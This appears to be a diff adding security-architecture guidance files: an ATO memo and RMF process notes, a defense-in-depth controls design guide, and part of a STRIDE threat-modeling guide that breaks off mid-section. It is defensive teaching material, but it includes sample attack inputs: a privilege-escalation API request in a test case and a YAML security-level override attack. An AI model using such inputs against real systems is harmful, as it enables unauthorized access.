SUBJECT: Authority to Operate (ATO) for [System Name]
1. AUTHORIZATION DECISION
After careful review of the System Security Plan (SSP), Security Assessment Report (SAR), and Plan of Action & Milestones (POA&M), I hereby grant an INTERIM AUTHORITY TO OPERATE for [System Name] for a period of SIX (6) MONTHS, effective [Start Date] to [End Date].
2. AUTHORIZATION BOUNDARY
This authorization covers the system as described in SSP version 2.1, including:
- Application servers (5x EC2 instances)
- PostgreSQL database cluster (2 nodes)
- AWS resources within VPC vpc-abc123
- Users: 500 internal staff with SECRET clearance
3. CONDITIONS OF AUTHORIZATION
This interim ATO is granted subject to the following conditions:
a) HIGH-severity finding IA-5-001 (password policy weakness) must be remediated within 30 days (by 2025-04-25). Failure to remediate will result in suspension of ATO.
b) All MEDIUM-severity findings must be remediated or risk-accepted within 90 days (by 2025-07-01).
c) Monthly POA&M status reports submitted to ISSM.
d) No major changes to system without prior authorization (change impact analysis required).
e) Full security re-assessment required at end of 6-month period for consideration of full 3-year ATO.
4. RESIDUAL RISKS ACCEPTED
I accept the following residual risks as documented in POA&M:
- SC-8-001 (LOW): HTTP on internal API (mitigated by network segmentation)
5. CONTINUOUS MONITORING
System owner must maintain continuous monitoring program including:
- Weekly vulnerability scans
- Monthly access reviews
- Quarterly control spot-checks
- Annual contingency plan testing
6. AUTHORIZATION TERMINATION
This authorization may be suspended or revoked if:
- Conditions of authorization not met
- New vulnerabilities with HIGH or CRITICAL severity discovered
- Significant security incident occurs
- Major system changes without authorization
Authorizing Official: [Signature]
[Name], [Title]
[Date]
```
## Authorization Types
### ATO (Authority to Operate)
**Full ATO**:
- Duration: 3 years (typically)
- Conditions: All HIGH/CRITICAL findings remediated or risk-accepted
- Re-authorization: Every 3 years or upon major change
**Interim ATO (IATO)**:
- Duration: 6-12 months
- Conditions: HIGH findings have remediation plan, progress tracked
- Purpose: Allow operation while remediating non-critical issues
- Requires full assessment at expiration
**Denial**:
- System does not meet minimum security requirements
- CRITICAL/HIGH findings with unacceptable risk
- Must remediate before re-submission
### AIS (Authorization to Interconnect)
**Purpose**: Authorization to connect two systems across trust boundaries.
**When needed**:
- Connecting to external networks
- Connecting systems at different classification levels
- Sharing data between organizations
**Requirements**:
- Both systems have current ATO
- Interconnection Security Agreement (ISA)
- Boundary protection documented
- Data flow diagrams
- Security controls at boundary (firewall, data diode, etc.)
**ISA Contents**:
```markdown
# Interconnection Security Agreement (ISA)
## Systems
- System A: [Name], ATO valid until [Date]
- System B: [Name], ATO valid until [Date]
## Data Flows
- Direction: System A → System B
- Data type: Transaction records (OFFICIAL classification)
- Frequency: Real-time API calls
- Volume: 10,000 records/day
## Boundary Protection
- Firewall: Palo Alto PA-5000 at boundary
- Allowed traffic: HTTPS port 443 only, source IP whitelisted
- Data validation: System B validates all incoming data
- Encryption: TLS 1.3 with mutual authentication
## Security Controls
- AC-4: Information flow enforcement (firewall rules)
- SC-7: Boundary protection (dedicated firewall)
- SC-8: Transmission confidentiality (TLS 1.3)
## Roles and Responsibilities
- System A ISSO: Monitor outbound connections, alert on anomalies
- System B ISSO: Validate incoming data, monitor for security events
- Network team: Maintain firewall, apply security patches
## Incident Response
- Security incident on either system triggers review of interconnection
- Contact: [System A ISSO], [System B ISSO]
## Review and Re-authorization
- Annual review of ISA
- Re-authorization required if either system ATO expires or major changes
**Approvals**:
- System A AO: [Signature] [Date]
- System B AO: [Signature] [Date]
```
### T&E (Test & Evaluation)
**Purpose**: Independent security testing before authorization.
**Testing Types**:
#### 1. Vulnerability Assessment
```bash
# Authenticated vulnerability scan
nessus scan --authenticated --target 10.0.1.0/24 \
--policy "Government High Baseline" \
--output vuln-report.pdf
# Results:
# Critical: 0
# High: 2 (outdated SSL certificates, missing patches)
# Medium: 15
# Low: 43
```
#### 2. Penetration Testing
```markdown
# Penetration Test Report
## Scope
- External penetration test (internet-facing)
- Internal penetration test (insider threat simulation)
- Duration: 2 weeks
## Rules of Engagement
- No DoS attacks
- No social engineering of executives
- Data exfiltration limited to test accounts
## Findings
### FINDING PT-001: HIGH
**Vulnerability**: SQL injection in /api/users endpoint
**Exploit**: Extracted 10 test user records via injection
**Impact**: Attacker could exfiltrate entire user database
**Recommendation**: Implement parameterized queries, input validation
**Remediation**: Developer committed fix (commit abc123), deployed 2025-03-20
**Verification**: Re-tested 2025-03-22, vulnerability no longer exploitable
## Summary
- High findings: 1 (remediated)
- Medium findings: 3 (2 remediated, 1 in POA&M)
- Low findings: 8 (accepted risk)
```
#### 3. Functional Security Testing
```markdown
# Functional Security Test: Access Control
## Test Case TC-AC-001: Unauthorized Access Attempt
**Objective**: Verify user cannot access resources without authorization
**Procedure**:
1. Login as user@example.com (no admin privileges)
2. Attempt to access /admin/users endpoint
3. Expected result: 403 Forbidden
**Actual Result**: 403 Forbidden ✅
**Status**: PASS
## Test Case TC-AC-002: Privilege Escalation
**Objective**: Verify user cannot elevate own privileges
**Procedure**:
1. Login as user@example.com
2. Attempt to modify own role via API: PUT /api/users/me {"role": "admin"}
3. Expected result: 403 Forbidden
**Actual Result**: 200 OK, role changed to admin ❌
**Status**: FAIL - CRITICAL
**Remediation Required**: Implement server-side role validation, users cannot modify own roles
```
**T&E Report**: Submitted to assessor as input to SAR.
## Continuous Monitoring
**Purpose**: Ongoing assurance that controls remain effective.
### Monitoring Activities
#### 1. Automated Scanning
```bash
# Weekly vulnerability scan
cron: 0 2 * * 1 /opt/nessus/scan.sh
# Monthly configuration compliance check
cron: 0 3 1 * * /opt/scap/compliance-check.sh
```
#### 2. Access Reviews
```markdown
# Monthly Access Review
## Review Date: 2025-04-01
## Reviewer: Data Owner (Jane Smith)
| User | Role | Last Login | Action |
|------|------|------------|--------|
| john.doe@example.com | Admin | 2025-03-28 | ✅ Retain |
| alice.smith@example.com | User | 2025-03-25 | ✅ Retain |
| bob.jones@example.com | Admin | 2024-12-15 | ❌ Remove (dormant 4 months) |
**Actions Taken**:
- Disabled bob.jones@example.com on 2025-04-02
- Notified ISSO of access review completion
```
#### 3. Change Impact Analysis
```markdown
# Change Impact Analysis: Database Upgrade
## Change Description
Upgrade PostgreSQL from 13.2 to 13.10 (security patches)
## Security Impact Assessment
- Controls affected: SC-28 (Protection of information at rest - encryption still enabled)
- New vulnerabilities: CVE-2024-XXXX patched in 13.10
- Configuration changes: None (encryption settings preserved)
## Authorization Impact
- Change Type: Minor (security patch)
- ATO Impact: None (no re-authorization required per continuous monitoring plan)
- ISSO Notification: Required (notified 2025-03-15)
## Testing
- Tested in dev environment: 2025-03-10 (PASS)
- Contingency plan: Snapshot before upgrade, 4-hour rollback window
## Approval
- ISSO: Approved (2025-03-16)
- System Owner: Approved (2025-03-17)
- Deployed: 2025-03-20
```
#### 4. Trigger Events for Re-Authorization
**Major change** (requires re-authorization before implementation):
- New system interconnection
- Change in classification level
- Major architectural change (e.g., move to cloud)
- Change in data types processed (e.g., add PII)
**Minor change** (notify ISSO, may not require re-authorization):
- Security patches
- Configuration hardening
- Adding users
## Quick Reference: Authorization Timeline
```
Month 1-2: PREPARE + CATEGORIZE + SELECT
- Define boundary, assemble team
- Determine impact level (Low/Moderate/High)
- Select control baseline (125-421 controls)
Month 3-6: IMPLEMENT
- Build system with security controls
- Write SSP (200-500 pages)
- Prepare evidence
Month 7-8: ASSESS
- Independent security assessment
- Penetration testing
- SAR with findings
Month 9: AUTHORIZE
- Remediate HIGH/CRITICAL findings
- Create POA&M for residual risks
- AO reviews package
- ATO issued (or IATO or Denial)
Ongoing: MONITOR
- Weekly scans
- Monthly access reviews
- Quarterly spot-checks
- Annual re-assessment or every 3 years
```
**Typical timeline**: 9-12 months for HIGH system, 6-9 months for MODERATE, 3-6 months for LOW.
## Common Mistakes
### ❌ Treating ATO as Checklist
**Wrong**: "We have all controls implemented, give us ATO"
**Right**: ATO is risk acceptance decision. Document residual risks, let AO decide.
**Why**: AO accepts risk on behalf of organization. Your job is to inform that decision, not make it.
### ❌ Starting SSP After Implementation
**Wrong**: Build system, then write SSP to document what exists
**Right**: Write SSP during design/implementation, update as you build
**Why**: SSP informs design decisions. Writing after implementation often reveals missing controls.
### ❌ Ignoring Continuous Monitoring
**Wrong**: Get ATO, assume you're done for 3 years
**Right**: Continuous monitoring is mandatory. Weekly scans, monthly reviews, change impact analysis.
**Why**: ATO can be revoked if controls degrade. Continuous monitoring proves ongoing compliance.
### ❌ No Risk Acceptance for Residual Risks
**Wrong**: Hide findings or claim "we'll fix later"
**Right**: Document in POA&M, explicit risk acceptance by AO for LOW/MEDIUM items
**Why**: Transparency builds trust. AO needs full picture to make informed decision.
### ❌ Vague Control Implementation Descriptions
**Wrong**: "AC-2: We manage accounts properly"
**Right**: "AC-2: ServiceNow ticket → manager approval → automated creation → 30-day inactivity disablement → monthly review. Evidence: /docs/account-mgmt.pdf"
**Why**: Assessor cannot verify vague descriptions. Specific implementation enables assessment.
## Cross-References
**Use WITH this skill**:
- `ordis/security-architect/security-controls-design` - Implement controls for SSP
- `ordis/security-architect/threat-modeling` - Inform security categorization
- `muna/technical-writer/operational-acceptance-documentation` - Write SSP/SAR/POA&M
**Use AFTER this skill**:
- `ordis/security-architect/classified-systems-security` - If system handles classified data
## Real-World Impact
**Systems using formal authorization processes**:
- **DoD Cloud Migration**: RMF process revealed 47 missing controls before migration. Remediated during IMPLEMENT phase (vs discovering at ASSESS). Achieved ATO in 9 months vs industry avg 14 months.
- **Healthcare System (Moderate)**: POA&M transparency with 12 accepted LOW risks enabled IATO while remediating MEDIUM findings. System operational 6 months earlier than "wait for perfect" approach.
- **Continuous Monitoring**: Weekly scans detected CVE-2024-XXXX within 48 hours of disclosure. Change impact analysis approved emergency patch in 24 hours (vs 3-week change control for non-monitored systems).
**Key lesson**: **Formal authorization process enables informed risk decisions by leadership. SSP+SAR+POA&M transparency beats "security by checklist" or "security by obscurity".**

View File

@@ -0,0 +1,537 @@
# Security Controls Design
## Overview
Design security controls as **layered defenses at trust boundaries**. Core principle: Apply systematic checks at every boundary to ensure no single control failure compromises security.
**Key insight**: List specific controls after identifying WHERE to apply them (trust boundaries first, then controls).
## When to Use
Load this skill when:
- Implementing authentication/authorization systems
- Hardening API endpoints, databases, file storage
- Designing data protection mechanisms
- Securing communication channels
- Protecting sensitive operations
**Symptoms you need this**:
- "How do I secure this API/database/upload feature?"
- "What controls should I implement?"
- "How do I prevent unauthorized access to X?"
- "How do I harden this system?"
**Don't use for**:
- Threat modeling (use `ordis/security-architect/threat-modeling` first)
- Code-level security patterns (use `ordis/security-architect/secure-code-patterns`)
- Reviewing existing designs (use `ordis/security-architect/security-architecture-review`)
## Core Methodology: Trust Boundaries First
**DON'T start with**: "What controls should I implement?"
**DO start with**: "Where are the trust boundaries?"
###Step 1: Identify Trust Boundaries
Trust boundaries are **points where data/requests cross from less-trusted to more-trusted zones**.
**Common boundaries:**
- Internet → API Gateway
- API Gateway → Application Server
- Application → Database
- Application → File Storage
- Unauthenticated → Authenticated
- User Role → Admin Role
- External Service → Internal Service
**Example: File Upload System**
```
Trust Boundaries:
1. User Browser → Upload Endpoint (UNTRUSTED → APP)
2. Upload Endpoint → Virus Scanner (APP → SCANNER)
3. Scanner → Storage (SCANNER → S3)
4. Storage → Display (S3 → USER)
5. Storage → Internal Processing (S3 → APP)
```
### Step 2: Apply Defense-in-Depth at Each Boundary
For EACH boundary, apply multiple control layers. If one fails, others provide backup.
## Defense-in-Depth Checklist
Use this checklist at **every trust boundary**:
### Layer 1: Validation (First Line)
- [ ] **Input validation**: Type, format, size, allowed values
- [ ] **Sanitization**: Remove dangerous characters, escape output
- [ ] **Canonicalization**: Resolve to standard form (prevent bypass)
### Layer 2: Authentication (Who Are You?)
- [ ] **Identity verification**: Credentials, tokens, certificates
- [ ] **Multi-factor authentication**: For sensitive boundaries
- [ ] **Session management**: Secure tokens, expiration, rotation
### Layer 3: Authorization (What Can You Do?)
- [ ] **Access control checks**: RBAC, ABAC, resource-level
- [ ] **Least privilege enforcement**: Grant minimum necessary
- [ ] **Privilege escalation prevention**: No path to higher access
### Layer 4: Rate Limiting (Abuse Prevention)
- [ ] **Request rate limits**: Per-IP, per-user, per-endpoint
- [ ] **Resource quotas**: Prevent resource exhaustion
- [ ] **Anomaly detection**: Flag unusual patterns
### Layer 5: Audit Logging (Detective)
- [ ] **Security event logging**: Who, what, when, where, outcome
- [ ] **Tamper-proof logs**: Write-only for applications
- [ ] **Alerting**: Automated detection of suspicious activity
### Layer 6: Encryption (Confidentiality)
- [ ] **Data in transit**: TLS 1.3, certificate validation
- [ ] **Data at rest**: Encryption for sensitive data
- [ ] **Key management**: Secure storage, rotation, separation
**Example Application** (API Authentication Boundary):
```
Internet → API Gateway boundary:
Layer 1 (Validation):
- Validate Authorization header present and well-formed
- Check request size limits (prevent DoS)
- Validate content-type and payload structure
Layer 2 (Authentication):
- Verify JWT signature (RS256, public key validation)
- Check token expiration (exp claim)
- Verify token not revoked (check Redis revocation list)
Layer 3 (Authorization):
- Extract scopes from token
- Verify endpoint requires scope present in token
- Check resource-level permissions (can user access THIS resource?)
Layer 4 (Rate Limiting):
- Per-token: 1000 requests/minute
- Per-IP: 100 requests/minute (catch token sharing)
- Per-endpoint: Stricter limits on write operations
Layer 5 (Audit Logging):
- Log authentication attempts (success/failure)
- Log authorization decisions (allowed/denied)
- Log resource access (who accessed what)
Layer 6 (Encryption):
- Enforce TLS 1.3 only (reject unencrypted)
- Validate certificate chain
- Store tokens encrypted in session store
```
**If ANY layer fails, others provide defense.**
## Fail-Secure Patterns
When a control fails, system should **default to secure state** (deny access, close connection, reject request).
### Fail-Closed (Secure) vs Fail-Open (Insecure)
| Situation | Fail-Open (❌ BAD) | Fail-Closed (✅ GOOD) |
|-----------|-------------------|---------------------|
| **Auth service down** | Allow all requests through | Deny all requests until service recovers |
| **Token validation fails** | Treat as valid | Reject request |
| **Database unreachable** | Skip permission check | Deny access |
| **Rate limit store unavailable** | No rate limiting | Apply strictest default limit |
| **Audit log fails to write** | Continue operation | Reject operation |
### Examples of Fail-Secure Implementation
**Example 1: Authentication Service Failure**
```python
def authenticate_request(request):
try:
token = extract_token(request)
user = auth_service.validate_token(token) # External service call
return user
except AuthServiceUnavailable:
# ❌ FAIL-OPEN: return AnonymousUser() # Let them through
# ✅ FAIL-CLOSED: raise Unauthorized("Authentication service unavailable")
raise Unauthorized("Authentication service unavailable")
except InvalidToken:
raise Unauthorized("Invalid token")
```
**Example 2: Rate Limiter Failure**
```python
def check_rate_limit(user_id):
try:
redis.incr(f"rate:{user_id}")
count = redis.get(f"rate:{user_id}")
if count > LIMIT:
raise RateLimitExceeded()
except RedisConnectionError:
# ❌ FAIL-OPEN: return # Let request through
# ✅ FAIL-CLOSED: Apply strictest default limit
# If Redis is down, apply aggressive in-memory rate limit
in_memory_limiter.check(user_id, limit=10) # Much stricter than normal
```
**Example 3: Database Permission Check**
```python
def can_user_access_resource(user_id, resource_id):
try:
permission = db.query(
"SELECT can_read FROM permissions WHERE user_id = ? AND resource_id = ?",
user_id, resource_id
)
return permission.can_read
except DatabaseConnectionError:
# ❌ FAIL-OPEN: return True # Assume they have access
# ✅ FAIL-CLOSED: return False # Deny access if can't verify
logger.error(f"DB unavailable, denying access for user={user_id} resource={resource_id}")
return False
```
**Example 4: File Type Validation**
```python
def validate_file_upload(file):
# Layer 1: Check extension
if file.extension not in ALLOWED_EXTENSIONS:
raise ValidationError("Invalid file type")
# Layer 2: Check magic bytes
try:
magic_bytes = file.read(16)
if not is_valid_magic_bytes(magic_bytes):
# ✅ FAIL-CLOSED: If magic bytes don't match, reject
# Even if extension passed, magic bytes take precedence
raise ValidationError("File content doesn't match extension")
except Exception as e:
# ❌ FAIL-OPEN: return True # Couldn't check, assume valid
# ✅ FAIL-CLOSED: raise ValidationError("Could not validate file")
raise ValidationError(f"Could not validate file: {e}")
```
**Principle**: **When in doubt, deny**. It's better to have a false positive (deny legitimate request) than false negative (allow malicious request).
## Least Privilege Principle
Grant **minimum necessary access** for each component to perform its function. No more.
### Application Method
**For each component, ask three questions:**
1. **What does it NEED to do?** (functional requirements)
2. **What's the MINIMUM access to achieve that?** (reduce scope)
3. **What can it NEVER do?** (explicit denials)
### Example: Database Access Roles
**Web Application Role:**
```sql
-- What it NEEDS: Read customers, write audit logs
GRANT SELECT ON customers TO web_app_user;
GRANT INSERT ON audit_logs TO web_app_user;
-- What's MINIMUM: No DELETE, no UPDATE on audit logs (immutable), no admin tables
REVOKE DELETE ON customers FROM web_app_user;
REVOKE ALL ON admin_users FROM web_app_user;
-- Explicit NEVER: Cannot modify audit logs (tamper-proof)
REVOKE UPDATE, DELETE ON audit_logs FROM web_app_user;
-- Row-level security: Only active customers
CREATE POLICY web_app_access ON customers
FOR SELECT TO web_app_user
USING (status = 'active');
```
**Analytics Role:**
```sql
-- What it NEEDS: Read non-PII customer data for analytics
-- What's MINIMUM: View with PII columns excluded
CREATE VIEW customers_analytics AS
SELECT customer_id, country, subscription_tier, created_at
FROM customers; -- Excludes: name, email, address
GRANT SELECT ON customers_analytics TO analytics_user;
-- What it can NEVER do: Access PII, modify data, see payment info
REVOKE ALL ON customers FROM analytics_user;
REVOKE ALL ON payment_info FROM analytics_user;
SET default_transaction_read_only = true FOR analytics_user;
```
### File System Permissions
**Application Server:**
```bash
# What it NEEDS: Read config, write logs, read/write uploads
/etc/app/config/ → Read-only (owner: root, chmod 640, group: app)
/var/log/app/ → Write-only (owner: app, chmod 200, append-only)
/var/uploads/ → Read/write (owner: app, chmod 700)
# What it can NEVER do: Write to config, execute from uploads
/etc/app/config/ → No write permissions
/var/uploads/ → Mount with noexec flag (prevent execution)
```
### API Scopes (OAuth2 Pattern)
```python
# User requests minimal scopes
scopes_requested = ["read:profile", "read:posts"]
# DON'T grant admin scopes by default
# DO grant only what was requested and approved
token = create_token(user, scopes=scopes_requested)
# At each endpoint, verify scope
@require_scope("write:posts")
def create_post(request):
# This endpoint is inaccessible with read:posts scope
pass
```
**Principle**: **Default deny, explicit allow**. Start with no access, grant only what's needed.
## Separation of Duties
**No single component/person/account should have complete control** over a critical operation.
### Patterns
#### Pattern 1: Multi-Signature Approvals
**Example: Production Deployments**
```yaml
# Require 2 approvals from different teams
approvals:
required: 2
teams:
- engineering-leads
- security-team
# Cannot approve own PR
prevent_self_approval: true
```
#### Pattern 2: Split Responsibilities
**Example: Payment Processing**
```python
# Component A: Initiates payment (can create, cannot approve)
payment_service.initiate_payment(amount, account)
# Component B: Approves payment (can approve, cannot create)
# Different credentials, different service
approval_service.approve_payment(payment_id)
# Component C: Executes payment (can execute, cannot create/approve)
# Only accepts approved payments
execution_service.execute_payment(approved_payment_id)
```
**No single service can create AND approve AND execute a payment.**
#### Pattern 3: Key Splitting
**Example: Encryption Key Management**
```python
# Master key split into 3 shares using Shamir Secret Sharing
# Require 2 of 3 shares to reconstruct
shares = split_key(master_key, threshold=2, num_shares=3)
# Distribute to different teams/locations
security_team.store(shares[0])
ops_team.store(shares[1])
compliance_team.store(shares[2])
# Reconstruction requires 2 teams to cooperate
reconstructed = reconstruct_key([shares[0], shares[1]])
```
#### Pattern 4: Admin Operations Require Approval
**Example: Database Admin Actions**
```python
# Admin initiates action (creates request, cannot execute)
admin_request = AdminRequest(
action="DELETE_USER",
user_id=12345,
reason="GDPR erasure request",
requested_by=admin_id
)
# Second admin reviews and approves (cannot initiate)
reviewer.approve(admin_request, reviewer_id=different_admin_id)
# System executes after approval (automated, no single admin control)
if admin_request.is_approved():
execute_admin_action(admin_request)
```
**Principle**: **Break critical paths into multiple steps requiring different actors.**
## Control Verification Method
For **each control you design**, ask: **"What if this control fails?"**
### Verification Checklist
**For each control:**
1. **What attack does this prevent?** (threat it addresses)
2. **How can this control fail?** (failure modes)
3. **What happens if it fails?** (impact)
4. **What's the next layer of defense?** (backup control)
5. **Is failure logged/detected?** (observability)
### Example: API Token Validation
**Control**: Verify JWT signature before processing request
1. **What attack**: Prevents forged tokens, ensures authenticity
2. **How it can fail**:
- Public key unavailable (service down)
- Expired token not caught (clock skew)
- Token revocation list unavailable (Redis down)
- Signature algorithm downgrade attack (accept HS256 instead of RS256)
3. **What if it fails**:
- Public key unavailable → Fail-closed (deny all requests)
- Expired token → Layer 2: Check expiration explicitly
- Revocation list down → Layer 3: Apply strict rate limits as fallback
- Algorithm downgrade → Layer 4: Explicitly require RS256, reject others
4. **Next layer**:
- Authorization checks (even with valid token, check permissions)
- Rate limiting (limit damage from compromised token)
- Audit logging (detect unusual access patterns)
5. **Failure logged**: Yes → Log signature validation failures, alert on spike
**Outcome**: Designed 4 layers of defense against token attacks.
### Example: File Upload Validation
**Control**: Check file extension against allowlist
1. **What attack**: Prevents upload of executable files (.exe, .sh)
2. **How it can fail**:
- Attacker renames malware.exe → malware.jpg
- Double extension: malware.jpg.exe
- Case variation: malware.ExE
3. **What if it fails**: Malicious file stored, potentially executed
4. **Next layers**:
- Layer 2: Magic byte verification (check file content, not name)
- Layer 3: Antivirus scanning (detect known malware)
- Layer 4: File reprocessing (re-encode images, destroying embedded code)
- Layer 5: noexec mount (storage prevents execution)
- Layer 6: Separate domain for user content (CSP prevents XSS)
5. **Failure logged**: Yes → Log validation failures, rejected files
**Outcome**: Extension check is Layer 1 of 6. If bypassed, 5 more layers prevent exploitation.
## Quick Reference: Control Selection
**For every trust boundary, apply this checklist:**
| Layer | Control Type | Example |
|-------|--------------|---------|
| **1. Validation** | Input checking | Size limits, type validation, sanitization |
| **2. Authentication** | Identity verification | JWT validation, certificate checks, MFA |
| **3. Authorization** | Permission checks | RBAC, resource-level access, least privilege |
| **4. Rate Limiting** | Abuse prevention | Per-user limits, anomaly detection, quotas |
| **5. Audit Logging** | Detective | Security events, tamper-proof logs, alerting |
| **6. Encryption** | Confidentiality | TLS in transit, encryption at rest, key management |
**For each control:**
- Define fail-secure behavior (what happens if it fails?)
- Apply least privilege (minimum necessary access)
- Verify separation of duties (no single point of complete control)
- Test "what if this fails?" (ensure backup layers exist)
## Common Mistakes
### ❌ Designing Controls Before Identifying Boundaries
**Wrong**: "I need authentication and authorization and rate limiting"
**Right**: "Where are my trust boundaries? → Internet→API, API→Database → At each: apply layered controls"
**Why**: Controls are meaningless without knowing WHERE to apply them.
### ❌ Single Layer of Defense
**Wrong**: "Authentication is enough security"
**Right**: "Authentication + Authorization + Rate Limiting + Audit Logging"
**Why**: If authentication is bypassed (bug, misconfiguration), other layers provide defense.
### ❌ Fail-Open Defaults
**Wrong**:
```python
try:
user = auth_service.validate(token)
except ServiceUnavailable:
user = AnonymousUser() # Let them through
```
**Right**:
```python
try:
user = auth_service.validate(token)
except ServiceUnavailable:
raise Unauthorized("Auth service unavailable")
```
**Why**: Control failure should result in secure state (deny), not insecure state (allow).
### ❌ Excessive Privileges
**Wrong**: Grant web application full database access (SELECT, INSERT, UPDATE, DELETE on all tables)
**Right**: Grant only needed operations per table (SELECT on customers, INSERT-only on audit_logs)
**Why**: Minimizes damage from compromised application (SQL injection, stolen credentials).
### ❌ Single Point of Control
**Wrong**: One admin account can initiate, approve, and execute critical operations
**Right**: Separate accounts for initiate vs approve, require multi-signature
**Why**: Prevents single compromised account from complete system control.
### ❌ No Verification of "What If This Fails?"
**Wrong**: Design controls, assume they work
**Right**: For each control, ask "how can this fail?" and design backup layers
**Why**: Controls fail due to bugs, misconfigurations, attacks. Backup layers provide resilience.
## Cross-References
**Use BEFORE this skill**:
- `ordis/security-architect/threat-modeling` - Identify threats first, then design controls to address them
**Use WITH this skill**:
- `muna/technical-writer/documentation-structure` - Document control architecture as ADR
**Use AFTER this skill**:
- `ordis/security-architect/security-architecture-review` - Review controls for completeness
## Real-World Impact
**Well-designed controls using this methodology:**
- Multi-layered API authentication catching token forgery even when signature validation was bypassed (algorithm confusion attack)
- Database access controls limiting SQL injection damage to read-only operations (least privilege prevented data deletion)
- File upload defenses stopping malware despite extension check bypass (magic bytes + antivirus + reprocessing layers)
**Key lesson**: **Systematic application of defense-in-depth at trust boundaries is more effective than ad-hoc control selection.**

View File

@@ -0,0 +1,565 @@
# Threat Modeling
## Overview
Systematic identification of security threats using proven frameworks. Threat modeling finds threats that intuition misses by applying structured methodologies.
**Core Principle**: Security intuition finds obvious threats. Systematic threat modeling finds subtle, critical threats that lead to real vulnerabilities.
## When to Use
Load this skill when:
- Designing new systems or features (before implementation)
- Adding security-sensitive functionality (auth, data handling, APIs)
- Reviewing existing designs for security gaps
- Investigating security incidents (what else could be exploited?)
- User mentions: "threat model", "security risks", "what could go wrong", "attack surface"
**Use BEFORE implementation** - threats found after deployment are 10x more expensive to fix.
## Don't Use For
- **Implementing specific security controls** (use security-controls-design)
- **Code-level security patterns** (use secure-by-design-patterns)
- **Reviewing existing designs for completeness** (use security-architecture-review)
- **Compliance mapping** (use compliance-awareness-and-mapping)
- **Documenting threats after they're identified** (use documenting-threats-and-controls)
This skill is for IDENTIFYING threats systematically. Once threats are identified, route to appropriate skills for designing controls, implementing patterns, or documenting decisions.
## The STRIDE Framework
**STRIDE** is a systematic threat enumeration framework. Apply to EVERY component, interface, and data flow.
### S - Spoofing Identity
**Definition**: Attacker pretends to be someone/something else
**Questions to Ask**:
- Can attacker claim a different identity?
- Is authentication required? Can it be bypassed?
- Are credentials properly validated?
- Can tokens/sessions be stolen or forged?
**Example Threats**:
- Stolen authentication tokens
- Forged JWT signatures
- Session hijacking via XSS
- API key leakage in logs
### T - Tampering with Data
**Definition**: Unauthorized modification of data or code
**Questions to Ask**:
- Can attacker modify data in transit? (MITM)
- Can attacker modify data at rest? (database, files, config)
- Can attacker modify code? (supply chain, config injection)
- **Can configuration override security properties?** (CRITICAL - often missed)
**Example Threats**:
- Configuration files modifying security_level properties
- YAML/JSON injection overriding access controls
- Database tampering if encryption/MAC missing
- Code injection via deserialization
**⚠️ Property Override Pattern** (VULN-004):
```yaml
# Plugin declares security_level=UNOFFICIAL in code
# Attacker adds to YAML config:
plugins:
datasource:
security_level: SECRET # OVERRIDES code declaration!
```
Always ask: **"Can external configuration override security-critical properties?"**
### R - Repudiation
**Definition**: Attacker denies performing an action (no audit trail)
**Questions to Ask**:
- Are security-relevant actions logged?
- Can logs be tampered with or deleted?
- Is logging sufficient for forensics?
- Can attacker perform reconnaissance without detection?
**Example Threats**:
- No logging of failed authorization attempts
- Logs stored without integrity protection (MAC, signatures)
- Insufficient detail for incident response
- Log injection attacks
### I - Information Disclosure
**Definition**: Exposure of information to unauthorized parties
**Questions to Ask**:
- What data is exposed in responses, logs, errors?
- Can attacker enumerate resources or users?
- Are temporary files, caches, or memory properly cleared?
- Can attacker infer sensitive data from timing/behavior?
**Example Threats**:
- Secrets in error messages or stack traces
- Timing attacks revealing password validity
- Cache poisoning exposing other users' data
- Path traversal reading arbitrary files
### D - Denial of Service
**Definition**: Making system unavailable or degrading performance
**Questions to Ask**:
- Are there resource limits (CPU, memory, connections)?
- Can attacker trigger expensive operations?
- Is rate limiting implemented?
- Can attacker cause crashes or hangs?
**Example Threats**:
- Unbounded recursion or loops
- Memory exhaustion via large payloads
- Algorithmic complexity attacks (e.g., hash collisions)
- Crash via malformed input
### E - Elevation of Privilege
**Definition**: Gaining capabilities beyond what's authorized
**Questions to Ask**:
- Can attacker access admin functions?
- Can attacker escalate from low to high privilege?
- Are privilege checks performed at every layer?
- **Can type system be bypassed?** (ADR-004 pattern)
**Example Threats**:
- Missing authorization checks on sensitive endpoints
- Horizontal privilege escalation (access other users' data)
- Vertical privilege escalation (user → admin)
- Duck typing allowing security bypass
## Attack Tree Construction
**Purpose**: Visual/structured representation of attack paths from goal → exploitation
### Attack Tree Format
```
ROOT: Attacker Goal (e.g., "Access classified data")
├─ BRANCH 1: Attack Vector
│ ├─ LEAF: Specific Exploit (with feasibility)
│ └─ LEAF: Alternative Exploit
├─ BRANCH 2: Alternative Vector
│ └─ LEAF: Exploit Method
```
### Example: Configuration Override Attack (VULN-004)
```
ROOT: Access classified data with insufficient clearance
├─ Override Plugin Security Level
│ ├─ Inject security_level into YAML config ⭐ (VULN-004 - actually happened)
│ ├─ Modify plugin source code (requires code access)
│ └─ Bypass registry to register malicious plugin (ADR-003 gap)
├─ Exploit Trusted Downgrade
│ ├─ Compromise high-clearance component (supply chain)
│ └─ Abuse legitimate downgrade path (ADR-005 gap)
├─ Bypass Type System
│ └─ Duck-type plugin without BasePlugin inheritance (ADR-004 gap)
```
**⭐ = Easiest/highest risk path**
### How to Build Attack Trees
1. **Start with attacker goal**: What does attacker want? (data access, DoS, privilege escalation)
2. **Branch by attack vector**: How could they achieve it? (config, network, code)
3. **Leaf nodes are specific exploits**: Concrete technical steps
4. **Mark feasibility**: Easy, Medium, Hard (or Low/Med/High effort)
5. **Identify easiest path**: This is your highest priority to mitigate
## Enforcement Gap Analysis
**Pattern**: Security properties must be enforced at EVERY layer. Single-layer enforcement fails.
### Layers to Check
**For any security property (e.g., security_level, access control, data classification):**
1. **Schema/Type Layer**: Is property type-safe? Can it be None/invalid?
2. **Registration Layer**: Is component registered? Can attacker bypass registry?
3. **Construction Layer**: Is property immutable after creation? Can it be modified?
4. **Runtime Layer**: Is property checked before sensitive operations?
5. **Post-Operation Layer**: Is result validated against expected property?
### Example: MLS Security Level Enforcement (ADR-002 → 005)
| Layer | Gap Found | Fix Required |
|-------|-----------|--------------|
| **Registry** | Plugin not registered at all (ADR-003) | Central plugin registry with runtime checks |
| **Type System** | Protocol allows duck typing bypass (ADR-004) | ABC with sealed methods, not Protocol |
| **Immutability** | security_level could be mutated (VULN-009) | Frozen dataclass + runtime checks |
| **Trust** | Trusted downgrade assumes no compromise (ADR-005) | Strict mode disables trusted downgrade |
**Key Insight**: Each gap was found AFTER implementation. Systematic enforcement gap analysis would have caught all four upfront.
### How to Apply
For each security property:
